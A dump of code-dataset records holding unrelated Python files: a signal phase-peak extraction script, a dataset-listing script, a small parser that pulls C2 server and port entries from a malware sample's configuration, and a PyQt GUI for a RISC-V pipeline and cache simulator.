"name"}, {"api_name": "src.LogFile.TYPE_G", "line_number": 97, "usage_type": "attribute"}, {"api_name": "src.ArgsParser.MyParser", "line_number": 129, "usage_type": "call"}, {"api_name": "src.ArgsParser.LOG_READ", "line_number": 129, "usage_type": "attribute"}, {"api_name": "src.ArgsParser", "line_number": 129, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 159, "usage_type": "call"}]} +{"seq_id": "44262021", "text": "import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport matplotlib\nimport sys\nimport random\nfrom tqdm import tqdm\n\ni_c, q_c = 1.934521753372309, 0.617395316850268\niq_ratio = 0.9261851848012432\n\n\nplt.style.use(\"ggplot\")\nplt.rcParams['axes.facecolor'] = '#f7f9fc'\n\nplt.rcParams.update({'font.size': 28})\nmatplotlib.rc('xtick', labelsize=24)\nmatplotlib.rc('ytick', labelsize=24)\n\n\ndef get_phase(data):\n    q = (data.q - q_c) * iq_ratio + q_c\n    return np.unwrap(2*np.arctan((q-q_c)/(data.i-i_c)))/2\n\ndef get_amp(data):\n    q = (data.q - q_c) * iq_ratio + q_c\n    return np.sqrt((q-q_c)**2 + (data.i-i_c)**2)/radius\n\nwindow = 70\nthreshold = 14 # to be set to 7 later\n\npp = []\n\nfor i in tqdm(range(20000)): # in theory, all of them\n    try:\n        df = pd.read_csv(f\"signal{i}.dat\", sep=' ')\n        df.columns = [\"i\", \"q\", \"t\"]\n    except:\n        continue\n    if np.sum(df.i > 4096): continue\n    df = df.sort_values([\"t\"])\n    df = df.reset_index()\n    df = df.iloc[10:3310]\n    df.i *= 3.3/4095\n    df.q *= 3.3/4095\n    df[\"phase\"] = get_phase(df)*1000\n    df.phase = df.phase.iloc[:500].mean() - df.phase\n\n    if df.phase.rolling(window).mean().diff(window).max() > threshold:\n        pp.append(df.phase.rolling(70).mean().max()*1.296) # 1.296 is the gain factor\n\npp = np.asarray(pp)\nnp.savetxt(\"phase_peaks_new.dat\", pp)\n", "sub_path": "peaks_reconstruction/save_peaks.py", "file_name": "save_peaks.py", "file_ext": "py", "file_size_in_byte": 1324, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "matplotlib.pyplot.style.use", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style", "line_number": 13, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 14, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams.update", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 16, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "matplotlib.rc", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.rc", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.unwrap", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.arctan", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 27, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 34, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "526718934", "text": "\"\"\"\nUsage:\n    main.py <directory> <outDirectory>\n    main.py -h | --help\nOptions:\n    <directory>     Specify the full path to the dataset directory\n    <outDirectory>  Directory to output the .txt files with all the filenames and gt data.\nExample:\n    python2 datasetToTxt.py /home/mcv/datasets/M5/classification/KITTI/ KITTI_txt\n\n\"\"\"\n\n# Imports\nimport os\nimport sys\nimport shutil\nimport glob\nimport numpy as np\nfrom docopt import docopt\n\n\n# Create a file with all the images as paths\ndef from_images_to_txt(directory, outDirectory):\n    directory = os.path.join(directory)\n    out_file = outDirectory + \"_images.txt\"\n    out_file_label = outDirectory + \"_labels.txt\"\n\n    folders = []\n\n    for subdir in sorted(os.listdir(directory)):\n        if os.path.isdir(os.path.join(directory, subdir)):\n            folders.append(subdir)\n    print(folders)\n\n    filenames = []\n    y = []\n\n    # Get filenames\n\n    for subdir in folders:\n\n        if subdir == 'images':\n            subpath = os.path.join(directory, subdir)\n            for fname in os.listdir(subpath):\n                filenames.append(os.path.join(subpath, fname))\n\n        if subdir == 'masks':\n            subpath1 = os.path.join(directory, subdir)\n            for fname1 in os.listdir(subpath1):\n                y.append(os.path.join(subpath1, fname1))\n\n    print(\" Saving file: \" + out_file)\n    outfile = open(out_file, \"w\")\n    out_file_label = open(out_file_label, \"w\")\n\n    for item in filenames:\n        
outfile.write(\"%s\\n\" % item)\n\n for label in y:\n out_file_label.write(\"%s\\n\" % label)\n\n\ndef main():\n if len(sys.argv) > 1:\n args = docopt(__doc__)\n\n directory = args['']\n outDirectory = args['']\n\n from_images_to_txt(directory+'/train', outDirectory+'/train')\n from_images_to_txt(directory+'/valid', outDirectory+'/valid')\n from_images_to_txt(directory+'/test', outDirectory+'/test')\n\n else:\n print ('Not enough arguments')\n exit()\n\n# Entry point of the script\nif __name__ == \"__main__\":\n main()\n", "sub_path": "CodeW3/dataset_2_text.py", "file_name": "dataset_2_text.py", "file_ext": "py", "file_size_in_byte": 2076, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.join", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 64, "usage_type": "attribute"}, {"api_name": "docopt.docopt", "line_number": 65, "usage_type": "call"}]} +{"seq_id": "259986912", "text": "from common.abstracts import MalParserBase\nfrom structs.remy import Remy\nfrom lib.struct_formatter import dive_struct\n\n\nclass MalParser(MalParserBase):\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.cfg_structs = Remy\n\t\tself.magic = b'\\w{1,10}\\.\\w{1,20}\\.\\w{1,6}:\\d{4}\\x0a'\n\t\tself.cfg_start_offset = 0\n\t\tself.cfg_size = 0x100\n\t\tself.json_key = ['c2_blocks']\n\n\tdef make_json(self):\n\t\tself.pretty_cfg = {}\n\t\tprint(self.raw_cfg.__dict__)\n\t\tfor key in self.raw_cfg.__dict__:\n\t\t\tif key not in self.json_key:\n\t\t\t\tcontinue\n\t\t\tvalue = self.raw_cfg.__dict__[key]\n\t\t\tif key == 'c2_blocks':\n\t\t\t self.pretty_cfg['c2_blocks'] = []\n\t\t\t for c2_block in value:\n\t\t\t\t c2_server = c2_block.__dict__['c2_server']\n\t\t\t\t port = c2_block.__dict__['port']\n\t\t\t\t self.pretty_cfg[key].append({'c2_server': c2_server, 'port':port})\n", "sub_path": "parsers/remy.py", "file_name": "remy.py", "file_ext": "py", "file_size_in_byte": 820, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "common.abstracts.MalParserBase", "line_number": 6, "usage_type": "name"}, {"api_name": "structs.remy.Remy", "line_number": 9, "usage_type": "name"}]} +{"seq_id": "529312562", "text": "from PyQt5 import QtCore, QtGui, QtWidgets\nimport importlib\nimport MachineCodeParser\nimport RunSim_forward\nimport RunSim_stall\nimport RunSim_non_pipelined\nimport 
sys\n#MachineCodeParser.parser(\"temp_gui_instructions.mc\")\n\npipeline = 0 #0 for non-pipelined, 1 for pipeline w/o forwarding, 2 for pipeline with forwarding\n\nclass Ui_MainWindow(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"RISC-V-Simulator\")\n MainWindow.resize(1390, 844)\n font = QtGui.QFont()\n font.setPointSize(11)\n MainWindow.setFont(font)\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n #\n self.label = QtWidgets.QLabel(self.centralwidget)\n self.label.setGeometry(QtCore.QRect(640, 10, 201, 31))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.label.setFont(font)\n self.label.setObjectName(\"label\")\n\n self.label_param1 = QtWidgets.QLabel(self.centralwidget)\n self.label_param1.setGeometry(QtCore.QRect(525, 100, 200, 25))\n self.label_param1.setObjectName(\"label_param1\")\n self.line_edit1 = QtWidgets.QLineEdit(self.centralwidget)\n self.line_edit1.setGeometry(QtCore.QRect(725, 100, 100, 25))\n self.line_edit1.setObjectName(\"line_edit1\")\n #self.line_edit1.returnPressed.connect(lambda: self.do_action_cache_size())\n\n self.label_param2 = QtWidgets.QLabel(self.centralwidget)\n self.label_param2.setGeometry(QtCore.QRect(525, 150, 200, 25))\n self.label_param2.setObjectName(\"label_param2\")\n self.line_edit2 = QtWidgets.QLineEdit(self.centralwidget)\n self.line_edit2.setGeometry(QtCore.QRect(725, 150, 100, 25))\n self.line_edit2.setObjectName(\"line_edit2\")\n #self.line_edit2.returnPressed.connect(lambda: self.do_action_block_size())\n\n self.label_param3 = QtWidgets.QLabel(self.centralwidget)\n self.label_param3.setGeometry(QtCore.QRect(525, 200, 200, 25))\n self.label_param3.setObjectName(\"label_param3\")\n self.line_edit3 = QtWidgets.QLineEdit(self.centralwidget)\n self.line_edit3.setGeometry(QtCore.QRect(725, 200, 100, 25))\n self.line_edit3.setObjectName(\"line_edit3\")\n #self.line_edit3.returnPressed.connect(lambda: self.do_action_associativity())\n self.label_param4 = QtWidgets.QLabel(self.centralwidget)\n self.label_param4.setGeometry(QtCore.QRect(525, 275, 200, 25))\n self.label_param4.setObjectName(\"label_param4\")\n self.line_edit4 = QtWidgets.QLineEdit(self.centralwidget)\n self.line_edit4.setGeometry(QtCore.QRect(725, 275, 100, 25))\n self.line_edit4.setObjectName(\"line_edit4\")\n\n self.label_param5 = QtWidgets.QLabel(self.centralwidget)\n self.label_param5.setGeometry(QtCore.QRect(525, 325, 200, 25))\n self.label_param5.setObjectName(\"label_param5\")\n self.line_edit5 = QtWidgets.QLineEdit(self.centralwidget)\n self.line_edit5.setGeometry(QtCore.QRect(725, 325, 100, 25))\n self.line_edit5.setObjectName(\"line_edit5\")\n\n self.label_param6 = QtWidgets.QLabel(self.centralwidget)\n self.label_param6.setGeometry(QtCore.QRect(525, 375, 200, 25))\n self.label_param6.setObjectName(\"label_param6\")\n self.line_edit6 = QtWidgets.QLineEdit(self.centralwidget)\n self.line_edit6.setGeometry(QtCore.QRect(725, 375, 100, 25))\n self.line_edit6.setObjectName(\"line_edit6\")\n\n self.radiobutton_pipeline_no_fwd = QtWidgets.QRadioButton(self.centralwidget)\n self.radiobutton_pipeline_no_fwd.setGeometry(QtCore.QRect(550, 450, 225, 50))\n self.radiobutton_pipeline_no_fwd.toggled.connect(self.pipeline_no_fwd_selected)\n\n self.radiobutton_pipeline_fwd = QtWidgets.QRadioButton(self.centralwidget)\n self.radiobutton_pipeline_fwd.setGeometry(QtCore.QRect(550, 500, 225, 50))\n self.radiobutton_pipeline_fwd.toggled.connect(self.pipeline_fwd_selected)\n\n self.radiobutton_non_pipeline = QtWidgets.QRadioButton(self.centralwidget)\n 
self.radiobutton_non_pipeline.setGeometry(QtCore.QRect(550, 550, 225, 50))\n self.radiobutton_non_pipeline.toggled.connect(self.non_pipeline_selected)\n\n\n self.frame = QtWidgets.QFrame(self.centralwidget)\n self.frame.setGeometry(QtCore.QRect(20, 50, 451, 711))\n self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame.setObjectName(\"frame\")\n self.label_2 = QtWidgets.QLabel(self.frame)\n self.label_2.setGeometry(QtCore.QRect(200, 10, 121, 21))\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_2.setFont(font)\n self.label_2.setObjectName(\"label_2\")\n #self.MachineCode = QtWidgets.QTextBrowser(self.frame)\n #self.MachineCode.setGeometry(QtCore.QRect(0, 40, 511, 681))\n #self.MachineCode.setReadOnly(False)\n #self.MachineCode.setAcceptRichText(False)\n #self.MachineCode.setLineWrapMode(False)\n #self.MachineCode.setObjectName(\"MachineCode\")\n #\n self.tableWidget = QtWidgets.QTableWidget(self.frame)\n self.tableWidget.setGeometry(QtCore.QRect(20, 40, 411, 671))\n self.tableWidget.setRowCount(0)\n self.tableWidget.setColumnCount(0)\n self.tableWidget.setObjectName(\"tableWidget\")\n #\n\n self.frame_3 = QtWidgets.QFrame(self.centralwidget)\n self.frame_3.setGeometry(QtCore.QRect(930, 50, 451, 711))\n self.frame_3.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame_3.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame_3.setObjectName(\"frame_3\")\n self.label_4 = QtWidgets.QLabel(self.frame_3)\n self.label_4.setGeometry(QtCore.QRect(200, 10, 71, 31))\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_4.setFont(font)\n self.label_4.setObjectName(\"label_4\")\n self.tableWidget2 = QtWidgets.QTableWidget(self.frame_3)\n self.tableWidget2.setGeometry(QtCore.QRect(20, 40, 411, 671))\n self.tableWidget2.setRowCount(0)\n self.tableWidget2.setColumnCount(0)\n self.tableWidget2.setObjectName(\"tableWidget2\")\n #\n self.Run = QtWidgets.QPushButton(self.centralwidget)\n self.Run.setGeometry(QtCore.QRect(640, 740, 141, 41))\n self.Run.setObjectName(\"Run\")\n self.Step = QtWidgets.QPushButton(self.centralwidget)\n self.Step.setGeometry(QtCore.QRect(640, 680, 141, 41))\n self.Step.setObjectName(\"Step\")\n self.Assemble = QtWidgets.QPushButton(self.centralwidget)\n self.Assemble.setGeometry(QtCore.QRect(640, 620, 141, 41))\n self.Assemble.setObjectName(\"Assemble\")\n MainWindow.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 1390, 26))\n self.menubar.setObjectName(\"menubar\")\n MainWindow.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n\n self.retranslateUi(MainWindow)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n # running button\n self.Run.clicked.connect(self.run)\n self.Assemble.clicked.connect(self.assemble)\n self.Step.clicked.connect(self.step)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"RISC-V-Simulator\", \"RISC-V-Simulator\"))\n self.label.setText(_translate(\"RISC-V-Simulator\", \"RISC-V SIMULATOR\"))\n self.label_2.setText(_translate(\"RISC-V-Simulator\", \"I$\"))\n #self.label_3.setText(_translate(\"RISC-V-Simulator\", \"Registers\"))\n self.label_4.setText(_translate(\"RISC-V-Simulator\", \"D$\"))\n\n self.label_param1.setText(_translate(\"RISC-V-Simulator\", \"I$ Cache Size (Bytes)\"))\n 
self.label_param2.setText(_translate(\"RISC-V-Simulator\", \"I$ Block Size (Bytes)\"))\n self.label_param3.setText(_translate(\"RISC-V-Simulator\", \"I$ Associativity\"))\n self.label_param4.setText(_translate(\"RISC-V-Simulator\", \"D$ Cache Size (Bytes)\"))\n self.label_param5.setText(_translate(\"RISC-V-Simulator\", \"D$ Block Size (Bytes)\"))\n self.label_param6.setText(_translate(\"RISC-V-Simulator\", \"D$ Associativity\"))\n\n self.radiobutton_pipeline_fwd.setText(_translate(\"RISC-V-Simulator\", \"Pipelined with Forwarding\"))\n self.radiobutton_pipeline_no_fwd.setText(_translate(\"RISC-V-Simulator\", \"Pipelined without Forwarding\"))\n self.radiobutton_non_pipeline.setText(_translate(\"RISC-V-Simulator\", \"Non-Pipelined\"))\n\n self.Run.setText(_translate(\"RISC-V-Simulator\", \"RUN\"))\n self.Step.setText(_translate(\"RISC-V-Simulator\", \"STEP\"))\n self.Assemble.setText(_translate(\"RISC-V-Simulator\", \"ASSEMBLE\"))\n\n def update_inst_cache(self, dic):\n #cache_list = list of sets(list of blocks)\n #maintain a non empty set boolean!!!??!!\n self.tableWidget.setRowCount(0)\n self.tableWidget.setColumnCount(2)\n self.tableWidget.setColumnWidth(0, 100)\n self.tableWidget.setColumnWidth(1, 1000)\n #self.tableWidget.setColumnWidth(2, 150)\n\n self.tableWidget.setHorizontalHeaderItem(0, QtWidgets.QTableWidgetItem(\"Tag\"))\n self.tableWidget.setHorizontalHeaderItem(1, QtWidgets.QTableWidgetItem(\"Contents\"))\n #self.tableWidget.setHorizontalHeaderItem(2, QtWidgets.QTableWidgetItem(\"Contents\"))\n\n i=0\n for key, value in dic.items():\n self.tableWidget.insertRow(self.tableWidget.rowCount())\n self.tableWidget.setItem(self.tableWidget.rowCount()-1, 0,\n QtWidgets.QTableWidgetItem(str(key)))\n s = [str(i) for i in value]\n self.tableWidget.setItem(self.tableWidget.rowCount()-1, 1,\n QtWidgets.QTableWidgetItem(\" | \".join(s)))\n print(key, \"|\".join(s))\n #print(key, value)\n\n\n def update_data_cache(self, dic):\n #cache_list = list of sets(list of blocks)\n #maintain a non empty set boolean!!!??!!\n self.tableWidget2.setRowCount(0)\n self.tableWidget2.setColumnCount(2)\n self.tableWidget2.setColumnWidth(0, 100)\n self.tableWidget2.setColumnWidth(1, 1000)\n #self.tableWidget2.setColumnWidth(2, 150)\n\n self.tableWidget2.setHorizontalHeaderItem(0, QtWidgets.QTableWidgetItem(\"Tag\"))\n self.tableWidget2.setHorizontalHeaderItem(1, QtWidgets.QTableWidgetItem(\"Contents\"))\n #self.tableWidget2.setHorizontalHeaderItem(2, QtWidgets.QTableWidgetItem(\"Contents\"))\n\n i=0\n for key, value in dic.items():\n self.tableWidget2.insertRow(self.tableWidget2.rowCount())\n self.tableWidget2.setItem(self.tableWidget2.rowCount()-1, 0,\n QtWidgets.QTableWidgetItem(str(key)))\n s = [str(i) for i in value]\n self.tableWidget2.setItem(self.tableWidget2.rowCount()-1, 1,\n QtWidgets.QTableWidgetItem(\" | \".join(s)))\n print(key, \"|\".join(s))\n\n def pipeline_no_fwd_selected(self, selected): #without data forwarding\n if selected:\n global pipeline\n pipeline = 1\n\n def pipeline_fwd_selected(self, selected): #with data forwarding\n if selected:\n global pipeline\n pipeline = 2\n\n def non_pipeline_selected(self, selected):\n if selected:\n global pipeline\n pipeline = 0\n\n def assemble(self):\n importlib.reload(RunSim_forward)\n importlib.reload(RunSim_stall)\n importlib.reload(RunSim_non_pipelined)\n importlib.reload(MachineCodeParser)\n MachineCodeParser.parser(sys.argv[1])\n RunSim_forward.memory.InitMemory(MachineCodeParser.PC_INST, MachineCodeParser.DATA, int(self.line_edit1.text()), 
int(self.line_edit2.text()), int(self.line_edit3.text()), int(self.line_edit4.text()), int(self.line_edit5.text()), int(self.line_edit6.text()))\n RunSim_stall.memory.InitMemory(MachineCodeParser.PC_INST, MachineCodeParser.DATA, int(self.line_edit1.text()), int(self.line_edit2.text()), int(self.line_edit3.text()), int(self.line_edit4.text()), int(self.line_edit5.text()), int(self.line_edit6.text()))\n RunSim_non_pipelined.memory.InitMemory(MachineCodeParser.PC_INST, MachineCodeParser.DATA, int(self.line_edit1.text()), int(self.line_edit2.text()), int(self.line_edit3.text()), int(self.line_edit4.text()), int(self.line_edit5.text()), int(self.line_edit6.text()))\n\n def padhexa(self, s):\n return '0x' + s[2:].zfill(8)\n\n def run(self):\n if pipeline==0:\n RunSim_non_pipelined.RunSim(1,1)\n if pipeline==1:\n RunSim_stall.RunSim(1,1)\n if pipeline==2:\n RunSim_forward.RunSim(1,1)\n if pipeline==0:\n self.update_inst_cache(RunSim_non_pipelined.memory.text_module.cache_module.cache_dict)\n self.update_data_cache(RunSim_non_pipelined.memory.data_module.cache_module.cache_dict)\n #print(RunSim_non_pipelined.memory.text_module.cache_module.cache_dict)\n if pipeline==1:\n self.update_inst_cache(RunSim_stall.memory.text_module.cache_module.cache_dict)\n self.update_data_cache(RunSim_stall.memory.data_module.cache_module.cache_dict)\n #print(RunSim_stall.memory.text_module.cache_module.cache_dict)\n if pipeline==2:\n self.update_inst_cache(RunSim_forward.memory.text_module.cache_module.cache_dict)\n self.update_data_cache(RunSim_forward.memory.data_module.cache_module.cache_dict)\n #print(RunSim_forward.memory.text_module.cache_module.cache_dict)\n #def print_reg(arr): # input is numpy array\n with open(f\"RegisterDump.mc\", \"w\") as fileReg:\n for i in range(32): # for all 32 registers\n fileReg.write(f\"x{i} \") # print address of register for eg. 
x5\n            if (RunSim_forward.registers.reg[i] >= 0):\n                fileReg.write(self.padhexa(hex(RunSim_forward.registers.reg[i])).upper().replace('X', 'x'))\n            else:\n                reg = RunSim_forward.registers.reg[i] & 0xffffffff # signed\n                fileReg.write(hex(reg).upper().replace('X', 'x'))\n            fileReg.write(\"\\n\")\n\n        #dumping memory\n        with open(f\"MemoryDump.mc\", \"w\") as fileMem: # input is dictionary with key as address and value as data\n            lst = [] # stores keys present in dictionary\n            temp_lst = [] # stores base address\n            for key in RunSim_forward.memory.data_module.memory:\n                lst.append(key)\n            lst.sort()\n            for x in lst:\n                temp = x - (x % 4) # storing base address in temp\n                if temp not in temp_lst: # if base address not present in temp_list , then append it\n                    temp_lst.append(temp)\n            temp_lst.sort()\n            for i in temp_lst:\n                fileMem.write(f\"{(self.padhexa(hex(i)).upper().replace('X', 'x'))} \") # printing base address\n                if i in lst:\n                    fileMem.write(f\"{(self.padhexa(hex(RunSim_forward.memory.data_module.memory[i])).upper())[8:]} \" ) # if key in dictionary, print its data\n                else:\n                    fileMem.write(\"00 \") # if key not in dictionary, print 00\n                if (i + 1) in lst:\n                    fileMem.write(f\"{(self.padhexa(hex(RunSim_forward.memory.data_module.memory[i + 1])).upper())[8:]} \")\n                else:\n                    fileMem.write(\"00 \")\n                if (i + 2) in lst:\n                    fileMem.write(f\"{(self.padhexa(hex(RunSim_forward.memory.data_module.memory[i + 2])).upper())[8:]} \")\n                else:\n                    fileMem.write(\"00 \")\n                if (i + 3) in lst:\n                    fileMem.write(f\"{(self.padhexa(hex(RunSim_forward.memory.data_module.memory[i + 3])).upper())[8:]} \")\n                else:\n                    fileMem.write(\"00 \")\n                fileMem.write(\"\\n\") # new line\n            lst = [] # stores keys present in dictionary\n            temp_lst = []\n            for key in RunSim_forward.memory.text_module.memory:\n                lst.append(key)\n            lst.sort()\n            for x in lst:\n                temp = x - (x % 4) # storing base address in temp\n                if temp not in temp_lst: # if base address not present in temp_list , then append it\n                    temp_lst.append(temp)\n            temp_lst.sort()\n            for i in temp_lst:\n                fileMem.write(f\"{(self.padhexa(hex(i)).upper().replace('X', 'x'))} \") # printing base address\n                if i in lst:\n                    fileMem.write(f\"{(self.padhexa(hex(RunSim_forward.memory.text_module.memory[i])).upper())[8:]} \" ) # if key in dictionary, print its data\n                else:\n                    fileMem.write(\"00 \") # if key not in dictionary, print 00\n                if (i + 1) in lst:\n                    fileMem.write(f\"{(self.padhexa(hex(RunSim_forward.memory.text_module.memory[i + 1])).upper())[8:]} \")\n                else:\n                    fileMem.write(\"00 \")\n                if (i + 2) in lst:\n                    fileMem.write(f\"{(self.padhexa(hex(RunSim_forward.memory.text_module.memory[i + 2])).upper())[8:]} \")\n                else:\n                    fileMem.write(\"00 \")\n                if (i + 3) in lst:\n                    fileMem.write(f\"{(self.padhexa(hex(RunSim_forward.memory.text_module.memory[i + 3])).upper())[8:]} \")\n                else:\n                    fileMem.write(\"00 \")\n                fileMem.write(\"\\n\") # new line\n        print(\"\\033[1;92mRegister and memory outputs written in RegisterDump.mc and MemoryDump.mc respectively\\033[0m\")\n        importlib.reload(RunSim_forward)\n        importlib.reload(RunSim_stall)\n        importlib.reload(RunSim_non_pipelined)\n        importlib.reload(MachineCodeParser)\n\n    def step(self):\n        if pipeline==0:\n            RunSim_non_pipelined.RunSim_step(1,1)\n        if pipeline==1:\n            RunSim_stall.RunSim_step(1,1)\n        if pipeline==2:\n            RunSim_forward.RunSim_step(1,1)\n        if pipeline==0:\n            self.update_inst_cache(RunSim_non_pipelined.memory.text_module.cache_module.cache_dict)\n            self.update_data_cache(RunSim_non_pipelined.memory.data_module.cache_module.cache_dict)\n\n            
#print(RunSim_non_pipelined.memory.text_module.cache_module.cache_dict)\n if pipeline==1:\n self.update_inst_cache(RunSim_stall.memory.text_module.cache_module.cache_dict)\n self.update_data_cache(RunSim_stall.memory.data_module.cache_module.cache_dict)\n #print(RunSim_stall.memory.text_module.cache_module.cache_dict)\n if pipeline==2:\n self.update_inst_cache(RunSim_forward.memory.text_module.cache_module.cache_dict)\n self.update_data_cache(RunSim_forward.memory.data_module.cache_module.cache_dict)\n #print(RunSim_forward.memory.text_module.cache_module.cache_dict)\n #def print_reg(arr): # input is numpy array\n with open(f\"RegisterDump.mc\", \"w\") as fileReg:\n for i in range(32): # for all 32 registers\n fileReg.write(f\"x{i} \") # print address of register for eg. x5\n if (RunSim_forward.registers.reg[i] >= 0):\n fileReg.write(self.padhexa(hex(RunSim_forward.registers.reg[i])).upper().replace('X', 'x'))\n else:\n reg = RunSim_forward.registers.reg[i] & 0xffffffff # signed\n fileReg.write(hex(reg).upper().replace('X', 'x'))\n fileReg.write(\"\\n\")\n\n #dumping memory\n with open(f\"MemoryDump.mc\", \"w\") as fileMem: # input is dictionary with key as address and value as data\n lst = [] # stores keys present in dictionary\n temp_lst = [] # stores base address\n for key in RunSim_forward.memory.data_module.memory:\n lst.append(key)\n lst.sort()\n for x in lst:\n temp = x - (x % 4) # storing base address in temp\n if temp not in temp_lst: # if base address not present in temp_list , then append it\n temp_lst.append(temp)\n temp_lst.sort()\n for i in temp_lst:\n fileMem.write(f\"{(self.padhexa(hex(i)).upper().replace('X', 'x'))} \") # printing base address\n if i in lst:\n fileMem.write(f\"{(self.padhexa(hex(RunSim_forward.memory.data_module.memory[i])).upper())[8:]} \" ) # if key in dictionary, print its data\n else:\n fileMem.write(\"00 \") # if key not in dictionary, print 00\n if (i + 1) in lst:\n fileMem.write(f\"{(self.padhexa(hex(RunSim_forward.memory.data_module.memory[i + 1])).upper())[8:]} \")\n else:\n fileMem.write(\"00 \")\n if (i + 2) in lst:\n fileMem.write(f\"{(self.padhexa(hex(RunSim_forward.memory.data_module.memory[i + 2])).upper())[8:]} \")\n else:\n fileMem.write(\"00 \")\n if (i + 3) in lst:\n fileMem.write(f\"{(self.padhexa(hex(RunSim_forward.memory.data_module.memory[i + 3])).upper())[8:]} \")\n else:\n fileMem.write(\"00 \")\n fileMem.write(\"\\n\") # new line\n lst = [] # stores keys present in dictionary\n temp_lst = []\n for key in RunSim_forward.memory.text_module.memory:\n lst.append(key)\n lst.sort()\n for x in lst:\n temp = x - (x % 4) # storing base address in temp\n if temp not in temp_lst: # if base address not present in temp_list , then append it\n temp_lst.append(temp)\n temp_lst.sort()\n for i in temp_lst:\n fileMem.write(f\"{(self.padhexa(hex(i)).upper().replace('X', 'x'))} \") # printing base address\n if i in lst:\n fileMem.write(f\"{(self.padhexa(hex(RunSim_forward.memory.text_module.memory[i])).upper())[8:]} \" ) # if key in dictionary, print its data\n else:\n fileMem.write(\"00 \") # if key not in dictionary, print 00\n if (i + 1) in lst:\n fileMem.write(f\"{(self.padhexa(hex(RunSim_forward.memory.text_module.memory[i + 1])).upper())[8:]} \")\n else:\n fileMem.write(\"00 \")\n if (i + 2) in lst:\n fileMem.write(f\"{(self.padhexa(hex(RunSim_forward.memory.text_module.memory[i + 2])).upper())[8:]} \")\n else:\n fileMem.write(\"00 \")\n if (i + 3) in lst:\n fileMem.write(f\"{(self.padhexa(hex(RunSim_forward.memory.text_module.memory[i + 
3])).upper())[8:]} \")\n else:\n fileMem.write(\"00 \")\n fileMem.write(\"\\n\") # new line\n\n # def run(self):\n\n # #import temp_main\n # # code to start running the code\n # # code to add data in register text Box\n # #code = self.MachineCode.toPlainText()\n # #print(code)\n # #fhand = open(\"gui_instructions.mc\", 'r')\n # #fhand.write(code)\n # #fhand.close()\n\n\n # #print(MachineCodeParser.PC_INST)\n # # program load\n # #RiscSim.memory.InitMemory(MachineCodeParser.PC_INST)\n # # Run the simulator\n # #RiscSim.RunSim()\n # ###temp_main.runMain()\n # # reg = np.array([1, -2, 3])\n # value = self.line_edit1.text()\n # print(int(value))\n # value = self.line_edit2.text()\n # print(int(value))\n # value = self.line_edit3.text()\n # print(int(value))\n # print(pipeline)\n\n\n # # f = open(\"cache_specs.txt\", \"w\")\n # # f.write(self.line_edit1.text()+\" \"+self.line_edit2.text()+\" \"+self.line_edit3.text())\n # # f.close()\n\n # #temp_main.runMain(pipeline)\n # if pipeline == 0:\n # import RunSim_non_pipelined\n # RunSim_non_pipelined.memory.InitMemory(MachineCodeParser.PC_INST, MachineCodeParser.DATA)\n # RunSim_non_pipelined.RunSim()\n # #add dumping functions\n # 